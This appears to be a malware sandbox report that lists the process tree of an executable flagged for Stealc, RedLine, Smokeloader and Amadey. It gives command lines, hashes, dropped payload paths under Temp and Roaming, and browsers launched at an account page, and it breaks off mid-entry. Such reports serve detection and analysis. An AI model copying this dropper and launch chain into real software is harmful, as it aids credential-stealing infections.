                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:01:13:58
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:214'528 bytes
                                                                                        MD5 hash:EAD5C20B175EBDDFC294F19D276D9F5A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2525036759.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2524711199.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2523988474.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:01:14:24
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGDHIIIIEHC.exe"
                                                                                        Imagebase:0x1c0000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:01:14:24
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\userGDHIIIIEHC.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\userGDHIIIIEHC.exe"
                                                                                        Imagebase:0xbe0000
                                                                                        File size:1'893'888 bytes
                                                                                        MD5 hash:A0CED1B039766FBE1B0C2DA4F5BBAA5E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2649666467.0000000000BE1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2403574007.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCFHCBKKFIJ.exe"
                                                                                        Imagebase:0x1c0000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\userCFHCBKKFIJ.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\userCFHCBKKFIJ.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:91'648 bytes
                                                                                        MD5 hash:D72007A9646255AC092CF654388CFEB8
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\userCFHCBKKFIJ.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2656.tmp\2657.tmp\2658.bat C:\Users\userCFHCBKKFIJ.exe"
                                                                                        Imagebase:0x7ff619a30000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
                                                                                        Imagebase:0x7ff684c40000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
                                                                                        Imagebase:0x7ff715da0000
                                                                                        File size:4'210'216 bytes
                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:01:14:25
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
                                                                                        Imagebase:0x7ff728280000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:01:14:26
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8
                                                                                        Imagebase:0x7ff684c40000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:01:14:26
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
                                                                                        Imagebase:0x7ff728280000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:01:14:26
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
                                                                                        Imagebase:0x7ff728280000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:01:14:27
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"
                                                                                        Imagebase:0x1c0000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:01:14:28
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2184,i,4203635227704693361,2033266922296475971,262144 /prefetch:3
                                                                                        Imagebase:0x7ff715da0000
                                                                                        File size:4'210'216 bytes
                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:01:14:28
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:01:14:28
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
                                                                                        Imagebase:0x7ff715da0000
                                                                                        File size:4'210'216 bytes
                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:01:14:28
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\AppData\RoamingCBGCBGCAFI.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"
                                                                                        Imagebase:0xd50000
                                                                                        File size:1'929'728 bytes
                                                                                        MD5 hash:927614BDB1FFF68B49468BC4A3886F36
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000003.2486192169.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.2671896489.0000000000D51000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 58%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:01:14:29
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:3
                                                                                        Imagebase:0x7ff715da0000
                                                                                        File size:4'210'216 bytes
                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:29
                                                                                        Start time:01:14:33
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 2384
                                                                                        Imagebase:0x220000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:30
                                                                                        Start time:01:14:34
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2188 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0cf79a7-9fe5-4dbc-be74-a5022d30a8d8} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e94a56a710 socket
                                                                                        Imagebase:0x7ff728280000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:33
                                                                                        Start time:01:14:39
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4440 -parentBuildID 20230927232528 -prefsHandle 4424 -prefMapHandle 4420 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9504f799-890a-40e2-aa3f-a414be824c0e} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e95cb89510 rdd
                                                                                        Imagebase:0x7ff728280000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:34
                                                                                        Start time:01:14:40
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6788 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                                                                                        Imagebase:0x7ff715da0000
                                                                                        File size:4'210'216 bytes
                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:35
                                                                                        Start time:01:14:40
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6976 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                                                                                        Imagebase:0x7ff715da0000
                                                                                        File size:4'210'216 bytes
                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:36
                                                                                        Start time:01:14:41
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                                                                                        Imagebase:0x7ff620620000
                                                                                        File size:1'255'976 bytes
                                                                                        MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:37
                                                                                        Start time:01:14:41
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                                                                                        Imagebase:0x7ff620620000
                                                                                        File size:1'255'976 bytes
                                                                                        MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:38
                                                                                        Start time:01:14:44
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7808 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                                                                                        Imagebase:0x7ff715da0000
                                                                                        File size:4'210'216 bytes
                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:40
                                                                                        Start time:01:14:47
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8
                                                                                        Imagebase:0x7ff684c40000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:41
                                                                                        Start time:01:14:47
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4208 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8
                                                                                        Imagebase:0x7ff684c40000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:42
                                                                                        Start time:01:14:48
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                                                                        Imagebase:0xab0000
                                                                                        File size:1'893'888 bytes
                                                                                        MD5 hash:A0CED1B039766FBE1B0C2DA4F5BBAA5E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002A.00000002.2666201612.0000000000AB1000.00000040.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002A.00000003.2622761332.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:43
                                                                                        Start time:01:14:51
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                                                                                        Imagebase:0x6a0000
                                                                                        File size:1'929'728 bytes
                                                                                        MD5 hash:927614BDB1FFF68B49468BC4A3886F36
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002B.00000002.2696337609.00000000006A1000.00000040.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002B.00000003.2655835967.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 58%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:44
                                                                                        Start time:01:15:00
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        Imagebase:0x6a0000
                                                                                        File size:1'929'728 bytes
                                                                                        MD5 hash:927614BDB1FFF68B49468BC4A3886F36
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000003.2737791928.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:45
                                                                                        Start time:01:15:00
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        Imagebase:0xab0000
                                                                                        File size:1'893'888 bytes
                                                                                        MD5 hash:A0CED1B039766FBE1B0C2DA4F5BBAA5E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002D.00000003.2736517396.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:46
                                                                                        Start time:01:15:08
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                                                                        Imagebase:
                                                                                        File size:1'893'888 bytes
                                                                                        MD5 hash:A0CED1B039766FBE1B0C2DA4F5BBAA5E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:47
                                                                                        Start time:01:15:10
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:214'528 bytes
                                                                                        MD5 hash:EAD5C20B175EBDDFC294F19D276D9F5A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002F.00000002.2938541456.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002F.00000002.2933859917.0000000000738000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:49
                                                                                        Start time:01:15:19
                                                                                        Start date:24/07/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 9252 -s 1304
                                                                                        Imagebase:0x220000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
